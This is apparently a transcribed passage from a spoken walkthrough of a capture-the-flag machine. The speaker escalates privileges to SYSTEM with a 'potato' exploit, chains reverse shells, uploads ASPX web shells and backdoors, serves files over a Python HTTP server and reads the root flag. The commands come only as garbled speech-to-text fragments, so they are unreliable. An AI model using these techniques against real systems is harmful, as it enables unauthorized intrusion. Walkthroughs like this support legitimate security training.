could literally just do cmd.exe or something. That wasn't it. That wasn't it. That wasn't it, coach. that was not the play. That was not the play. Okay. It's finicky. It's finicky. Doesn't like me. It is what it is. Let's wait a little longer and just hope that it hope that we don't crash the server again. Okay. So the shell has crashed. That's fine. Let's execute again. Oh. Oh no. I'm starting to panic. Okay. Starting to panic. Starting to panic because this might not be it, coach. Okay. Program data. Let's just do it properly, man. Let's just do it properly. Let's stop messing around, man. Oh my god. Okay. Dash cmd slash c. Who am I? Show you that I got NT authority. Please work. please, God potato. Okay. Now let us get our shell with the changed port, and we just do something like this, and hopefully we get the NT authority shell back in this top screen right here. Is there a world where it doesn't happen? Potentially. Should happen though. Oh my god. Why? Why? There we go. Okay. Who am I? NT authority. Oh, I spoke too soon. It is kind of laggy. It doesn't like the quadruple reverse shell technique that we are doing. um, we are tunneled into a tunnel. X. we can also just cat out the root flag, instead of getting a stable shell. But yeah, we're getting close. We're so close. Yet so far. Please have mercy. Maybe we should have done it a different way. Maybe. Into the instability of our shells is a product of our hubris, I think. hubris. Hubris indeed. Hubris. You may say, why are you so impatient? It's very good. Very good question. The SPX shell that we're using is ass, man. we need to get a different ASPX shell. Use a different ASPX shell instead of the one that I use, basically. The one that I used was not this one originally, and I think that is what's causing us issues. Um, let's. I mean, should we do another one? We'll try one more time. Honestly, like maybe it'll work, maybe it won't. If it doesn't work, then we'll go ahead and upload a different ASPX shell, and then that should stabilize it better. So then we don't have this type of issue. Oh my gosh, what are we doing? What are we doing, man? Oh my gosh, man. Oh, we're trolling. That's what we're doing. We do a little bit of trolling. We do a little bit of trolling. Okay. Potato.exe fcd /c. Maybe don't do the who am I command. Maybe just go straight for rev shell and just call it a day. We have to get the rev shell, okay? You don't understand. Important part of the process. Fuck. Fuck. You wrong. This one doesn't like us. Okay. Authority system. Who am I? Get us this. Hopefully, you give us a shell back. Please, please, pretty breach. Give us a shell. Give us a shell. Be so kind. Be so kind as to give us a shell and then work when you give me the shell. This is the definition of insanity. Let's go for another shell. .aspx. ASPX C2 I'll upload web nifa ASPX backdoor. Okay, so we did get the shell. Stable sheet. Let's see. Let's copy the. Let's remove this shell.aspx. Copy the shell.aspx that we had grabbed before. I don't remember what it's called. Oh, cd console, then shell.aspx, and copy it here. And let's do a python -m http server, and maybe we actually like rename this to shell.aspx. And then we'll start a Python server. Okay. Having some issues here. Oh, interesting. It's working now. Isn't that so strange? Okay, we got the root flag. I don't know. I think that the reason is because of the stability of the ASPX, but I'm not 100% sure. Maybe it's just the box being unstable. But we did get the root. And yeah, I hope this was enlightening for you. It was a really, really long experience, but it was an interesting machine. It's definitely very fun. And yeah, hope you enjoyed. See you.